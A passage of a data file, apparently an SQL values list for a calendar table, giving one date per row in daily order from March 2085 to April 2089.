('2085-03-20'),
('2085-03-21'),
('2085-03-22'),
('2085-03-23'),
('2085-03-24'),
('2085-03-25'),
('2085-03-26'),
('2085-03-27'),
('2085-03-28'),
('2085-03-29'),
('2085-03-30'),
('2085-03-31'),
('2085-04-01'),
('2085-04-02'),
('2085-04-03'),
('2085-04-04'),
('2085-04-05'),
('2085-04-06'),
('2085-04-07'),
('2085-04-08'),
('2085-04-09'),
('2085-04-10'),
('2085-04-11'),
('2085-04-12'),
('2085-04-13'),
('2085-04-14'),
('2085-04-15'),
('2085-04-16'),
('2085-04-17'),
('2085-04-18'),
('2085-04-19'),
('2085-04-20'),
('2085-04-21'),
('2085-04-22'),
('2085-04-23'),
('2085-04-24'),
('2085-04-25'),
('2085-04-26'),
('2085-04-27'),
('2085-04-28'),
('2085-04-29'),
('2085-04-30'),
('2085-05-01'),
('2085-05-02'),
('2085-05-03'),
('2085-05-04'),
('2085-05-05'),
('2085-05-06'),
('2085-05-07'),
('2085-05-08'),
('2085-05-09'),
('2085-05-10'),
('2085-05-11'),
('2085-05-12'),
('2085-05-13'),
('2085-05-14'),
('2085-05-15'),
('2085-05-16'),
('2085-05-17'),
('2085-05-18'),
('2085-05-19'),
('2085-05-20'),
('2085-05-21'),
('2085-05-22'),
('2085-05-23'),
('2085-05-24'),
('2085-05-25'),
('2085-05-26'),
('2085-05-27'),
('2085-05-28'),
('2085-05-29'),
('2085-05-30'),
('2085-05-31'),
('2085-06-01'),
('2085-06-02'),
('2085-06-03'),
('2085-06-04'),
('2085-06-05'),
('2085-06-06'),
('2085-06-07'),
('2085-06-08'),
('2085-06-09'),
('2085-06-10'),
('2085-06-11'),
('2085-06-12'),
('2085-06-13'),
('2085-06-14'),
('2085-06-15'),
('2085-06-16'),
('2085-06-17'),
('2085-06-18'),
('2085-06-19'),
('2085-06-20'),
('2085-06-21'),
('2085-06-22'),
('2085-06-23'),
('2085-06-24'),
('2085-06-25'),
('2085-06-26'),
('2085-06-27'),
('2085-06-28'),
('2085-06-29'),
('2085-06-30'),
('2085-07-01'),
('2085-07-02'),
('2085-07-03'),
('2085-07-04'),
('2085-07-05'),
('2085-07-06'),
('2085-07-07'),
('2085-07-08'),
('2085-07-09'),
('2085-07-10'),
('2085-07-11'),
('2085-07-12'),
('2085-07-13'),
('2085-07-14'),
('2085-07-15'),
('2085-07-16'),
('2085-07-17'),
('2085-07-18'),
('2085-07-19'),
('2085-07-20'),
('2085-07-21'),
('2085-07-22'),
('2085-07-23'),
('2085-07-24'),
('2085-07-25'),
('2085-07-26'),
('2085-07-27'),
('2085-07-28'),
('2085-07-29'),
('2085-07-30'),
('2085-07-31'),
('2085-08-01'),
('2085-08-02'),
('2085-08-03'),
('2085-08-04'),
('2085-08-05'),
('2085-08-06'),
('2085-08-07'),
('2085-08-08'),
('2085-08-09'),
('2085-08-10'),
('2085-08-11'),
('2085-08-12'),
('2085-08-13'),
('2085-08-14'),
('2085-08-15'),
('2085-08-16'),
('2085-08-17'),
('2085-08-18'),
('2085-08-19'),
('2085-08-20'),
('2085-08-21'),
('2085-08-22'),
('2085-08-23'),
('2085-08-24'),
('2085-08-25'),
('2085-08-26'),
('2085-08-27'),
('2085-08-28'),
('2085-08-29'),
('2085-08-30'),
('2085-08-31'),
('2085-09-01'),
('2085-09-02'),
('2085-09-03'),
('2085-09-04'),
('2085-09-05'),
('2085-09-06'),
('2085-09-07'),
('2085-09-08'),
('2085-09-09'),
('2085-09-10'),
('2085-09-11'),
('2085-09-12'),
('2085-09-13'),
('2085-09-14'),
('2085-09-15'),
('2085-09-16'),
('2085-09-17'),
('2085-09-18'),
('2085-09-19'),
('2085-09-20'),
('2085-09-21'),
('2085-09-22'),
('2085-09-23'),
('2085-09-24'),
('2085-09-25'),
('2085-09-26'),
('2085-09-27'),
('2085-09-28'),
('2085-09-29'),
('2085-09-30'),
('2085-10-01'),
('2085-10-02'),
('2085-10-03'),
('2085-10-04'),
('2085-10-05'),
('2085-10-06'),
('2085-10-07'),
('2085-10-08'),
('2085-10-09'),
('2085-10-10'),
('2085-10-11'),
('2085-10-12'),
('2085-10-13'),
('2085-10-14'),
('2085-10-15'),
('2085-10-16'),
('2085-10-17'),
('2085-10-18'),
('2085-10-19'),
('2085-10-20'),
('2085-10-21'),
('2085-10-22'),
('2085-10-23'),
('2085-10-24'),
('2085-10-25'),
('2085-10-26'),
('2085-10-27'),
('2085-10-28'),
('2085-10-29'),
('2085-10-30'),
('2085-10-31'),
('2085-11-01'),
('2085-11-02'),
('2085-11-03'),
('2085-11-04'),
('2085-11-05'),
('2085-11-06'),
('2085-11-07'),
('2085-11-08'),
('2085-11-09'),
('2085-11-10'),
('2085-11-11'),
('2085-11-12'),
('2085-11-13'),
('2085-11-14'),
('2085-11-15'),
('2085-11-16'),
('2085-11-17'),
('2085-11-18'),
('2085-11-19'),
('2085-11-20'),
('2085-11-21'),
('2085-11-22'),
('2085-11-23'),
('2085-11-24'),
('2085-11-25'),
('2085-11-26'),
('2085-11-27'),
('2085-11-28'),
('2085-11-29'),
('2085-11-30'),
('2085-12-01'),
('2085-12-02'),
('2085-12-03'),
('2085-12-04'),
('2085-12-05'),
('2085-12-06'),
('2085-12-07'),
('2085-12-08'),
('2085-12-09'),
('2085-12-10'),
('2085-12-11'),
('2085-12-12'),
('2085-12-13'),
('2085-12-14'),
('2085-12-15'),
('2085-12-16'),
('2085-12-17'),
('2085-12-18'),
('2085-12-19'),
('2085-12-20'),
('2085-12-21'),
('2085-12-22'),
('2085-12-23'),
('2085-12-24'),
('2085-12-25'),
('2085-12-26'),
('2085-12-27'),
('2085-12-28'),
('2085-12-29'),
('2085-12-30'),
('2085-12-31'),
('2086-01-01'),
('2086-01-02'),
('2086-01-03'),
('2086-01-04'),
('2086-01-05'),
('2086-01-06'),
('2086-01-07'),
('2086-01-08'),
('2086-01-09'),
('2086-01-10'),
('2086-01-11'),
('2086-01-12'),
('2086-01-13'),
('2086-01-14'),
('2086-01-15'),
('2086-01-16'),
('2086-01-17'),
('2086-01-18'),
('2086-01-19'),
('2086-01-20'),
('2086-01-21'),
('2086-01-22'),
('2086-01-23'),
('2086-01-24'),
('2086-01-25'),
('2086-01-26'),
('2086-01-27'),
('2086-01-28'),
('2086-01-29'),
('2086-01-30'),
('2086-01-31'),
('2086-02-01'),
('2086-02-02'),
('2086-02-03'),
('2086-02-04'),
('2086-02-05'),
('2086-02-06'),
('2086-02-07'),
('2086-02-08'),
('2086-02-09'),
('2086-02-10'),
('2086-02-11'),
('2086-02-12'),
('2086-02-13'),
('2086-02-14'),
('2086-02-15'),
('2086-02-16'),
('2086-02-17'),
('2086-02-18'),
('2086-02-19'),
('2086-02-20'),
('2086-02-21'),
('2086-02-22'),
('2086-02-23'),
('2086-02-24'),
('2086-02-25'),
('2086-02-26'),
('2086-02-27'),
('2086-02-28'),
('2086-03-01'),
('2086-03-02'),
('2086-03-03'),
('2086-03-04'),
('2086-03-05'),
('2086-03-06'),
('2086-03-07'),
('2086-03-08'),
('2086-03-09'),
('2086-03-10'),
('2086-03-11'),
('2086-03-12'),
('2086-03-13'),
('2086-03-14'),
('2086-03-15'),
('2086-03-16'),
('2086-03-17'),
('2086-03-18'),
('2086-03-19'),
('2086-03-20'),
('2086-03-21'),
('2086-03-22'),
('2086-03-23'),
('2086-03-24'),
('2086-03-25'),
('2086-03-26'),
('2086-03-27'),
('2086-03-28'),
('2086-03-29'),
('2086-03-30'),
('2086-03-31'),
('2086-04-01'),
('2086-04-02'),
('2086-04-03'),
('2086-04-04'),
('2086-04-05'),
('2086-04-06'),
('2086-04-07'),
('2086-04-08'),
('2086-04-09'),
('2086-04-10'),
('2086-04-11'),
('2086-04-12'),
('2086-04-13'),
('2086-04-14'),
('2086-04-15'),
('2086-04-16'),
('2086-04-17'),
('2086-04-18'),
('2086-04-19'),
('2086-04-20'),
('2086-04-21'),
('2086-04-22'),
('2086-04-23'),
('2086-04-24'),
('2086-04-25'),
('2086-04-26'),
('2086-04-27'),
('2086-04-28'),
('2086-04-29'),
('2086-04-30'),
('2086-05-01'),
('2086-05-02'),
('2086-05-03'),
('2086-05-04'),
('2086-05-05'),
('2086-05-06'),
('2086-05-07'),
('2086-05-08'),
('2086-05-09'),
('2086-05-10'),
('2086-05-11'),
('2086-05-12'),
('2086-05-13'),
('2086-05-14'),
('2086-05-15'),
('2086-05-16'),
('2086-05-17'),
('2086-05-18'),
('2086-05-19'),
('2086-05-20'),
('2086-05-21'),
('2086-05-22'),
('2086-05-23'),
('2086-05-24'),
('2086-05-25'),
('2086-05-26'),
('2086-05-27'),
('2086-05-28'),
('2086-05-29'),
('2086-05-30'),
('2086-05-31'),
('2086-06-01'),
('2086-06-02'),
('2086-06-03'),
('2086-06-04'),
('2086-06-05'),
('2086-06-06'),
('2086-06-07'),
('2086-06-08'),
('2086-06-09'),
('2086-06-10'),
('2086-06-11'),
('2086-06-12'),
('2086-06-13'),
('2086-06-14'),
('2086-06-15'),
('2086-06-16'),
('2086-06-17'),
('2086-06-18'),
('2086-06-19'),
('2086-06-20'),
('2086-06-21'),
('2086-06-22'),
('2086-06-23'),
('2086-06-24'),
('2086-06-25'),
('2086-06-26'),
('2086-06-27'),
('2086-06-28'),
('2086-06-29'),
('2086-06-30'),
('2086-07-01'),
('2086-07-02'),
('2086-07-03'),
('2086-07-04'),
('2086-07-05'),
('2086-07-06'),
('2086-07-07'),
('2086-07-08'),
('2086-07-09'),
('2086-07-10'),
('2086-07-11'),
('2086-07-12'),
('2086-07-13'),
('2086-07-14'),
('2086-07-15'),
('2086-07-16'),
('2086-07-17'),
('2086-07-18'),
('2086-07-19'),
('2086-07-20'),
('2086-07-21'),
('2086-07-22'),
('2086-07-23'),
('2086-07-24'),
('2086-07-25'),
('2086-07-26'),
('2086-07-27'),
('2086-07-28'),
('2086-07-29'),
('2086-07-30'),
('2086-07-31'),
('2086-08-01'),
('2086-08-02'),
('2086-08-03'),
('2086-08-04'),
('2086-08-05'),
('2086-08-06'),
('2086-08-07'),
('2086-08-08'),
('2086-08-09'),
('2086-08-10'),
('2086-08-11'),
('2086-08-12'),
('2086-08-13'),
('2086-08-14'),
('2086-08-15'),
('2086-08-16'),
('2086-08-17'),
('2086-08-18'),
('2086-08-19'),
('2086-08-20'),
('2086-08-21'),
('2086-08-22'),
('2086-08-23'),
('2086-08-24'),
('2086-08-25'),
('2086-08-26'),
('2086-08-27'),
('2086-08-28'),
('2086-08-29'),
('2086-08-30'),
('2086-08-31'),
('2086-09-01'),
('2086-09-02'),
('2086-09-03'),
('2086-09-04'),
('2086-09-05'),
('2086-09-06'),
('2086-09-07'),
('2086-09-08'),
('2086-09-09'),
('2086-09-10'),
('2086-09-11'),
('2086-09-12'),
('2086-09-13'),
('2086-09-14'),
('2086-09-15'),
('2086-09-16'),
('2086-09-17'),
('2086-09-18'),
('2086-09-19'),
('2086-09-20'),
('2086-09-21'),
('2086-09-22'),
('2086-09-23'),
('2086-09-24'),
('2086-09-25'),
('2086-09-26'),
('2086-09-27'),
('2086-09-28'),
('2086-09-29'),
('2086-09-30'),
('2086-10-01'),
('2086-10-02'),
('2086-10-03'),
('2086-10-04'),
('2086-10-05'),
('2086-10-06'),
('2086-10-07'),
('2086-10-08'),
('2086-10-09'),
('2086-10-10'),
('2086-10-11'),
('2086-10-12'),
('2086-10-13'),
('2086-10-14'),
('2086-10-15'),
('2086-10-16'),
('2086-10-17'),
('2086-10-18'),
('2086-10-19'),
('2086-10-20'),
('2086-10-21'),
('2086-10-22'),
('2086-10-23'),
('2086-10-24'),
('2086-10-25'),
('2086-10-26'),
('2086-10-27'),
('2086-10-28'),
('2086-10-29'),
('2086-10-30'),
('2086-10-31'),
('2086-11-01'),
('2086-11-02'),
('2086-11-03'),
('2086-11-04'),
('2086-11-05'),
('2086-11-06'),
('2086-11-07'),
('2086-11-08'),
('2086-11-09'),
('2086-11-10'),
('2086-11-11'),
('2086-11-12'),
('2086-11-13'),
('2086-11-14'),
('2086-11-15'),
('2086-11-16'),
('2086-11-17'),
('2086-11-18'),
('2086-11-19'),
('2086-11-20'),
('2086-11-21'),
('2086-11-22'),
('2086-11-23'),
('2086-11-24'),
('2086-11-25'),
('2086-11-26'),
('2086-11-27'),
('2086-11-28'),
('2086-11-29'),
('2086-11-30'),
('2086-12-01'),
('2086-12-02'),
('2086-12-03'),
('2086-12-04'),
('2086-12-05'),
('2086-12-06'),
('2086-12-07'),
('2086-12-08'),
('2086-12-09'),
('2086-12-10'),
('2086-12-11'),
('2086-12-12'),
('2086-12-13'),
('2086-12-14'),
('2086-12-15'),
('2086-12-16'),
('2086-12-17'),
('2086-12-18'),
('2086-12-19'),
('2086-12-20'),
('2086-12-21'),
('2086-12-22'),
('2086-12-23'),
('2086-12-24'),
('2086-12-25'),
('2086-12-26'),
('2086-12-27'),
('2086-12-28'),
('2086-12-29'),
('2086-12-30'),
('2086-12-31'),
('2087-01-01'),
('2087-01-02'),
('2087-01-03'),
('2087-01-04'),
('2087-01-05'),
('2087-01-06'),
('2087-01-07'),
('2087-01-08'),
('2087-01-09'),
('2087-01-10'),
('2087-01-11'),
('2087-01-12'),
('2087-01-13'),
('2087-01-14'),
('2087-01-15'),
('2087-01-16'),
('2087-01-17'),
('2087-01-18'),
('2087-01-19'),
('2087-01-20'),
('2087-01-21'),
('2087-01-22'),
('2087-01-23'),
('2087-01-24'),
('2087-01-25'),
('2087-01-26'),
('2087-01-27'),
('2087-01-28'),
('2087-01-29'),
('2087-01-30'),
('2087-01-31'),
('2087-02-01'),
('2087-02-02'),
('2087-02-03'),
('2087-02-04'),
('2087-02-05'),
('2087-02-06'),
('2087-02-07'),
('2087-02-08'),
('2087-02-09'),
('2087-02-10'),
('2087-02-11'),
('2087-02-12'),
('2087-02-13'),
('2087-02-14'),
('2087-02-15'),
('2087-02-16'),
('2087-02-17'),
('2087-02-18'),
('2087-02-19'),
('2087-02-20'),
('2087-02-21'),
('2087-02-22'),
('2087-02-23'),
('2087-02-24'),
('2087-02-25'),
('2087-02-26'),
('2087-02-27'),
('2087-02-28'),
('2087-03-01'),
('2087-03-02'),
('2087-03-03'),
('2087-03-04'),
('2087-03-05'),
('2087-03-06'),
('2087-03-07'),
('2087-03-08'),
('2087-03-09'),
('2087-03-10'),
('2087-03-11'),
('2087-03-12'),
('2087-03-13'),
('2087-03-14'),
('2087-03-15'),
('2087-03-16'),
('2087-03-17'),
('2087-03-18'),
('2087-03-19'),
('2087-03-20'),
('2087-03-21'),
('2087-03-22'),
('2087-03-23'),
('2087-03-24'),
('2087-03-25'),
('2087-03-26'),
('2087-03-27'),
('2087-03-28'),
('2087-03-29'),
('2087-03-30'),
('2087-03-31'),
('2087-04-01'),
('2087-04-02'),
('2087-04-03'),
('2087-04-04'),
('2087-04-05'),
('2087-04-06'),
('2087-04-07'),
('2087-04-08'),
('2087-04-09'),
('2087-04-10'),
('2087-04-11'),
('2087-04-12'),
('2087-04-13'),
('2087-04-14'),
('2087-04-15'),
('2087-04-16'),
('2087-04-17'),
('2087-04-18'),
('2087-04-19'),
('2087-04-20'),
('2087-04-21'),
('2087-04-22'),
('2087-04-23'),
('2087-04-24'),
('2087-04-25'),
('2087-04-26'),
('2087-04-27'),
('2087-04-28'),
('2087-04-29'),
('2087-04-30'),
('2087-05-01'),
('2087-05-02'),
('2087-05-03'),
('2087-05-04'),
('2087-05-05'),
('2087-05-06'),
('2087-05-07'),
('2087-05-08'),
('2087-05-09'),
('2087-05-10'),
('2087-05-11'),
('2087-05-12'),
('2087-05-13'),
('2087-05-14'),
('2087-05-15'),
('2087-05-16'),
('2087-05-17'),
('2087-05-18'),
('2087-05-19'),
('2087-05-20'),
('2087-05-21'),
('2087-05-22'),
('2087-05-23'),
('2087-05-24'),
('2087-05-25'),
('2087-05-26'),
('2087-05-27'),
('2087-05-28'),
('2087-05-29'),
('2087-05-30'),
('2087-05-31'),
('2087-06-01'),
('2087-06-02'),
('2087-06-03'),
('2087-06-04'),
('2087-06-05'),
('2087-06-06'),
('2087-06-07'),
('2087-06-08'),
('2087-06-09'),
('2087-06-10'),
('2087-06-11'),
('2087-06-12'),
('2087-06-13'),
('2087-06-14'),
('2087-06-15'),
('2087-06-16'),
('2087-06-17'),
('2087-06-18'),
('2087-06-19'),
('2087-06-20'),
('2087-06-21'),
('2087-06-22'),
('2087-06-23'),
('2087-06-24'),
('2087-06-25'),
('2087-06-26'),
('2087-06-27'),
('2087-06-28'),
('2087-06-29'),
('2087-06-30'),
('2087-07-01'),
('2087-07-02'),
('2087-07-03'),
('2087-07-04'),
('2087-07-05'),
('2087-07-06'),
('2087-07-07'),
('2087-07-08'),
('2087-07-09'),
('2087-07-10'),
('2087-07-11'),
('2087-07-12'),
('2087-07-13'),
('2087-07-14'),
('2087-07-15'),
('2087-07-16'),
('2087-07-17'),
('2087-07-18'),
('2087-07-19'),
('2087-07-20'),
('2087-07-21'),
('2087-07-22'),
('2087-07-23'),
('2087-07-24'),
('2087-07-25'),
('2087-07-26'),
('2087-07-27'),
('2087-07-28'),
('2087-07-29'),
('2087-07-30'),
('2087-07-31'),
('2087-08-01'),
('2087-08-02'),
('2087-08-03'),
('2087-08-04'),
('2087-08-05'),
('2087-08-06'),
('2087-08-07'),
('2087-08-08'),
('2087-08-09'),
('2087-08-10'),
('2087-08-11'),
('2087-08-12'),
('2087-08-13'),
('2087-08-14'),
('2087-08-15'),
('2087-08-16'),
('2087-08-17'),
('2087-08-18'),
('2087-08-19'),
('2087-08-20'),
('2087-08-21'),
('2087-08-22'),
('2087-08-23'),
('2087-08-24'),
('2087-08-25'),
('2087-08-26'),
('2087-08-27'),
('2087-08-28'),
('2087-08-29'),
('2087-08-30'),
('2087-08-31'),
('2087-09-01'),
('2087-09-02'),
('2087-09-03'),
('2087-09-04'),
('2087-09-05'),
('2087-09-06'),
('2087-09-07'),
('2087-09-08'),
('2087-09-09'),
('2087-09-10'),
('2087-09-11'),
('2087-09-12'),
('2087-09-13'),
('2087-09-14'),
('2087-09-15'),
('2087-09-16'),
('2087-09-17'),
('2087-09-18'),
('2087-09-19'),
('2087-09-20'),
('2087-09-21'),
('2087-09-22'),
('2087-09-23'),
('2087-09-24'),
('2087-09-25'),
('2087-09-26'),
('2087-09-27'),
('2087-09-28'),
('2087-09-29'),
('2087-09-30'),
('2087-10-01'),
('2087-10-02'),
('2087-10-03'),
('2087-10-04'),
('2087-10-05'),
('2087-10-06'),
('2087-10-07'),
('2087-10-08'),
('2087-10-09'),
('2087-10-10'),
('2087-10-11'),
('2087-10-12'),
('2087-10-13'),
('2087-10-14'),
('2087-10-15'),
('2087-10-16'),
('2087-10-17'),
('2087-10-18'),
('2087-10-19'),
('2087-10-20'),
('2087-10-21'),
('2087-10-22'),
('2087-10-23'),
('2087-10-24'),
('2087-10-25'),
('2087-10-26'),
('2087-10-27'),
('2087-10-28'),
('2087-10-29'),
('2087-10-30'),
('2087-10-31'),
('2087-11-01'),
('2087-11-02'),
('2087-11-03'),
('2087-11-04'),
('2087-11-05'),
('2087-11-06'),
('2087-11-07'),
('2087-11-08'),
('2087-11-09'),
('2087-11-10'),
('2087-11-11'),
('2087-11-12'),
('2087-11-13'),
('2087-11-14'),
('2087-11-15'),
('2087-11-16'),
('2087-11-17'),
('2087-11-18'),
('2087-11-19'),
('2087-11-20'),
('2087-11-21'),
('2087-11-22'),
('2087-11-23'),
('2087-11-24'),
('2087-11-25'),
('2087-11-26'),
('2087-11-27'),
('2087-11-28'),
('2087-11-29'),
('2087-11-30'),
('2087-12-01'),
('2087-12-02'),
('2087-12-03'),
('2087-12-04'),
('2087-12-05'),
('2087-12-06'),
('2087-12-07'),
('2087-12-08'),
('2087-12-09'),
('2087-12-10'),
('2087-12-11'),
('2087-12-12'),
('2087-12-13'),
('2087-12-14'),
('2087-12-15'),
('2087-12-16'),
('2087-12-17'),
('2087-12-18'),
('2087-12-19'),
('2087-12-20'),
('2087-12-21'),
('2087-12-22'),
('2087-12-23'),
('2087-12-24'),
('2087-12-25'),
('2087-12-26'),
('2087-12-27'),
('2087-12-28'),
('2087-12-29'),
('2087-12-30'),
('2087-12-31'),
('2088-01-01'),
('2088-01-02'),
('2088-01-03'),
('2088-01-04'),
('2088-01-05'),
('2088-01-06'),
('2088-01-07'),
('2088-01-08'),
('2088-01-09'),
('2088-01-10'),
('2088-01-11'),
('2088-01-12'),
('2088-01-13'),
('2088-01-14'),
('2088-01-15'),
('2088-01-16'),
('2088-01-17'),
('2088-01-18'),
('2088-01-19'),
('2088-01-20'),
('2088-01-21'),
('2088-01-22'),
('2088-01-23'),
('2088-01-24'),
('2088-01-25'),
('2088-01-26'),
('2088-01-27'),
('2088-01-28'),
('2088-01-29'),
('2088-01-30'),
('2088-01-31'),
('2088-02-01'),
('2088-02-02'),
('2088-02-03'),
('2088-02-04'),
('2088-02-05'),
('2088-02-06'),
('2088-02-07'),
('2088-02-08'),
('2088-02-09'),
('2088-02-10'),
('2088-02-11'),
('2088-02-12'),
('2088-02-13'),
('2088-02-14'),
('2088-02-15'),
('2088-02-16'),
('2088-02-17'),
('2088-02-18'),
('2088-02-19'),
('2088-02-20'),
('2088-02-21'),
('2088-02-22'),
('2088-02-23'),
('2088-02-24'),
('2088-02-25'),
('2088-02-26'),
('2088-02-27'),
('2088-02-28'),
('2088-02-29'),
('2088-03-01'),
('2088-03-02'),
('2088-03-03'),
('2088-03-04'),
('2088-03-05'),
('2088-03-06'),
('2088-03-07'),
('2088-03-08'),
('2088-03-09'),
('2088-03-10'),
('2088-03-11'),
('2088-03-12'),
('2088-03-13'),
('2088-03-14'),
('2088-03-15'),
('2088-03-16'),
('2088-03-17'),
('2088-03-18'),
('2088-03-19'),
('2088-03-20'),
('2088-03-21'),
('2088-03-22'),
('2088-03-23'),
('2088-03-24'),
('2088-03-25'),
('2088-03-26'),
('2088-03-27'),
('2088-03-28'),
('2088-03-29'),
('2088-03-30'),
('2088-03-31'),
('2088-04-01'),
('2088-04-02'),
('2088-04-03'),
('2088-04-04'),
('2088-04-05'),
('2088-04-06'),
('2088-04-07'),
('2088-04-08'),
('2088-04-09'),
('2088-04-10'),
('2088-04-11'),
('2088-04-12'),
('2088-04-13'),
('2088-04-14'),
('2088-04-15'),
('2088-04-16'),
('2088-04-17'),
('2088-04-18'),
('2088-04-19'),
('2088-04-20'),
('2088-04-21'),
('2088-04-22'),
('2088-04-23'),
('2088-04-24'),
('2088-04-25'),
('2088-04-26'),
('2088-04-27'),
('2088-04-28'),
('2088-04-29'),
('2088-04-30'),
('2088-05-01'),
('2088-05-02'),
('2088-05-03'),
('2088-05-04'),
('2088-05-05'),
('2088-05-06'),
('2088-05-07'),
('2088-05-08'),
('2088-05-09'),
('2088-05-10'),
('2088-05-11'),
('2088-05-12'),
('2088-05-13'),
('2088-05-14'),
('2088-05-15'),
('2088-05-16'),
('2088-05-17'),
('2088-05-18'),
('2088-05-19'),
('2088-05-20'),
('2088-05-21'),
('2088-05-22'),
('2088-05-23'),
('2088-05-24'),
('2088-05-25'),
('2088-05-26'),
('2088-05-27'),
('2088-05-28'),
('2088-05-29'),
('2088-05-30'),
('2088-05-31'),
('2088-06-01'),
('2088-06-02'),
('2088-06-03'),
('2088-06-04'),
('2088-06-05'),
('2088-06-06'),
('2088-06-07'),
('2088-06-08'),
('2088-06-09'),
('2088-06-10'),
('2088-06-11'),
('2088-06-12'),
('2088-06-13'),
('2088-06-14'),
('2088-06-15'),
('2088-06-16'),
('2088-06-17'),
('2088-06-18'),
('2088-06-19'),
('2088-06-20'),
('2088-06-21'),
('2088-06-22'),
('2088-06-23'),
('2088-06-24'),
('2088-06-25'),
('2088-06-26'),
('2088-06-27'),
('2088-06-28'),
('2088-06-29'),
('2088-06-30'),
('2088-07-01'),
('2088-07-02'),
('2088-07-03'),
('2088-07-04'),
('2088-07-05'),
('2088-07-06'),
('2088-07-07'),
('2088-07-08'),
('2088-07-09'),
('2088-07-10'),
('2088-07-11'),
('2088-07-12'),
('2088-07-13'),
('2088-07-14'),
('2088-07-15'),
('2088-07-16'),
('2088-07-17'),
('2088-07-18'),
('2088-07-19'),
('2088-07-20'),
('2088-07-21'),
('2088-07-22'),
('2088-07-23'),
('2088-07-24'),
('2088-07-25'),
('2088-07-26'),
('2088-07-27'),
('2088-07-28'),
('2088-07-29'),
('2088-07-30'),
('2088-07-31'),
('2088-08-01'),
('2088-08-02'),
('2088-08-03'),
('2088-08-04'),
('2088-08-05'),
('2088-08-06'),
('2088-08-07'),
('2088-08-08'),
('2088-08-09'),
('2088-08-10'),
('2088-08-11'),
('2088-08-12'),
('2088-08-13'),
('2088-08-14'),
('2088-08-15'),
('2088-08-16'),
('2088-08-17'),
('2088-08-18'),
('2088-08-19'),
('2088-08-20'),
('2088-08-21'),
('2088-08-22'),
('2088-08-23'),
('2088-08-24'),
('2088-08-25'),
('2088-08-26'),
('2088-08-27'),
('2088-08-28'),
('2088-08-29'),
('2088-08-30'),
('2088-08-31'),
('2088-09-01'),
('2088-09-02'),
('2088-09-03'),
('2088-09-04'),
('2088-09-05'),
('2088-09-06'),
('2088-09-07'),
('2088-09-08'),
('2088-09-09'),
('2088-09-10'),
('2088-09-11'),
('2088-09-12'),
('2088-09-13'),
('2088-09-14'),
('2088-09-15'),
('2088-09-16'),
('2088-09-17'),
('2088-09-18'),
('2088-09-19'),
('2088-09-20'),
('2088-09-21'),
('2088-09-22'),
('2088-09-23'),
('2088-09-24'),
('2088-09-25'),
('2088-09-26'),
('2088-09-27'),
('2088-09-28'),
('2088-09-29'),
('2088-09-30'),
('2088-10-01'),
('2088-10-02'),
('2088-10-03'),
('2088-10-04'),
('2088-10-05'),
('2088-10-06'),
('2088-10-07'),
('2088-10-08'),
('2088-10-09'),
('2088-10-10'),
('2088-10-11'),
('2088-10-12'),
('2088-10-13'),
('2088-10-14'),
('2088-10-15'),
('2088-10-16'),
('2088-10-17'),
('2088-10-18'),
('2088-10-19'),
('2088-10-20'),
('2088-10-21'),
('2088-10-22'),
('2088-10-23'),
('2088-10-24'),
('2088-10-25'),
('2088-10-26'),
('2088-10-27'),
('2088-10-28'),
('2088-10-29'),
('2088-10-30'),
('2088-10-31'),
('2088-11-01'),
('2088-11-02'),
('2088-11-03'),
('2088-11-04'),
('2088-11-05'),
('2088-11-06'),
('2088-11-07'),
('2088-11-08'),
('2088-11-09'),
('2088-11-10'),
('2088-11-11'),
('2088-11-12'),
('2088-11-13'),
('2088-11-14'),
('2088-11-15'),
('2088-11-16'),
('2088-11-17'),
('2088-11-18'),
('2088-11-19'),
('2088-11-20'),
('2088-11-21'),
('2088-11-22'),
('2088-11-23'),
('2088-11-24'),
('2088-11-25'),
('2088-11-26'),
('2088-11-27'),
('2088-11-28'),
('2088-11-29'),
('2088-11-30'),
('2088-12-01'),
('2088-12-02'),
('2088-12-03'),
('2088-12-04'),
('2088-12-05'),
('2088-12-06'),
('2088-12-07'),
('2088-12-08'),
('2088-12-09'),
('2088-12-10'),
('2088-12-11'),
('2088-12-12'),
('2088-12-13'),
('2088-12-14'),
('2088-12-15'),
('2088-12-16'),
('2088-12-17'),
('2088-12-18'),
('2088-12-19'),
('2088-12-20'),
('2088-12-21'),
('2088-12-22'),
('2088-12-23'),
('2088-12-24'),
('2088-12-25'),
('2088-12-26'),
('2088-12-27'),
('2088-12-28'),
('2088-12-29'),
('2088-12-30'),
('2088-12-31'),
('2089-01-01'),
('2089-01-02'),
('2089-01-03'),
('2089-01-04'),
('2089-01-05'),
('2089-01-06'),
('2089-01-07'),
('2089-01-08'),
('2089-01-09'),
('2089-01-10'),
('2089-01-11'),
('2089-01-12'),
('2089-01-13'),
('2089-01-14'),
('2089-01-15'),
('2089-01-16'),
('2089-01-17'),
('2089-01-18'),
('2089-01-19'),
('2089-01-20'),
('2089-01-21'),
('2089-01-22'),
('2089-01-23'),
('2089-01-24'),
('2089-01-25'),
('2089-01-26'),
('2089-01-27'),
('2089-01-28'),
('2089-01-29'),
('2089-01-30'),
('2089-01-31'),
('2089-02-01'),
('2089-02-02'),
('2089-02-03'),
('2089-02-04'),
('2089-02-05'),
('2089-02-06'),
('2089-02-07'),
('2089-02-08'),
('2089-02-09'),
('2089-02-10'),
('2089-02-11'),
('2089-02-12'),
('2089-02-13'),
('2089-02-14'),
('2089-02-15'),
('2089-02-16'),
('2089-02-17'),
('2089-02-18'),
('2089-02-19'),
('2089-02-20'),
('2089-02-21'),
('2089-02-22'),
('2089-02-23'),
('2089-02-24'),
('2089-02-25'),
('2089-02-26'),
('2089-02-27'),
('2089-02-28'),
('2089-03-01'),
('2089-03-02'),
('2089-03-03'),
('2089-03-04'),
('2089-03-05'),
('2089-03-06'),
('2089-03-07'),
('2089-03-08'),
('2089-03-09'),
('2089-03-10'),
('2089-03-11'),
('2089-03-12'),
('2089-03-13'),
('2089-03-14'),
('2089-03-15'),
('2089-03-16'),
('2089-03-17'),
('2089-03-18'),
('2089-03-19'),
('2089-03-20'),
('2089-03-21'),
('2089-03-22'),
('2089-03-23'),
('2089-03-24'),
('2089-03-25'),
('2089-03-26'),
('2089-03-27'),
('2089-03-28'),
('2089-03-29'),
('2089-03-30'),
('2089-03-31'),
('2089-04-01'),
('2089-04-02'),
('2089-04-03'),
('2089-04-04'),
('2089-04-05'),
('2089-04-06'),
('2089-04-07'),
('2089-04-08'),
('2089-04-09'),
('2089-04-10'),
('2089-04-11'),
('2089-04-12'),
('2089-04-13'),
('2089-04-14'),
('2089-04-15'),
('2089-04-16'),
('2089-04-17'),
('2089-04-18'),
('2089-04-19'),
('2089-04-20'),
('2089-04-21'),
('2089-04-22'),
('2089-04-23'),
('2089-04-24'),
('2089-04-25'),
('2089-04-26'),
('2089-04-27'),
